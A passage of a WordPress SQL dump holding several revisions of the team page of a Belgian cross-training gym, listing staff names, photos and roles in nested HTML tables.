(137, 1, '2013-06-16 15:02:45', '2013-06-16 15:02:45', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-10', '', '', '2013-06-16 15:02:45', '2013-06-16 15:02:45', '', 20, 'http://www.crosstrainingcenter.be/?p=137', 0, 'revision', '', 0),
(241, 1, '2013-07-03 19:36:43', '2013-07-03 19:36:43', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"180\" height=\"235\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"180\" height=\"233\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-19', '', '', '2013-07-03 19:36:43', '2013-07-03 19:36:43', '', 20, 'http://www.crosstrainingcenter.be/?p=241', 0, 'revision', '', 0),
(138, 1, '2013-06-16 15:03:45', '2013-06-16 15:03:45', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table></div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table></div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table></div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table></div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table></div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table></div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table></div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-11', '', '', '2013-06-16 15:03:45', '2013-06-16 15:03:45', '', 20, 'http://www.crosstrainingcenter.be/?p=138', 0, 'revision', '', 0),
(140, 1, '2013-06-16 15:07:01', '2013-06-16 15:07:01', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\n\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Baptiste Pitsaer</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Anaïs Gosset</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-13', '', '', '2013-06-16 15:07:01', '2013-06-16 15:07:01', '', 20, 'http://www.crosstrainingcenter.be/?p=140', 0, 'revision', '', 0),
(139, 1, '2013-06-16 15:04:18', '2013-06-16 15:04:18', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Daimen Pierrard</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-12', '', '', '2013-06-16 15:04:18', '2013-06-16 15:04:18', '', 20, 'http://www.crosstrainingcenter.be/?p=139', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(141, 1, '2013-06-16 15:07:42', '2013-06-16 15:07:42', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 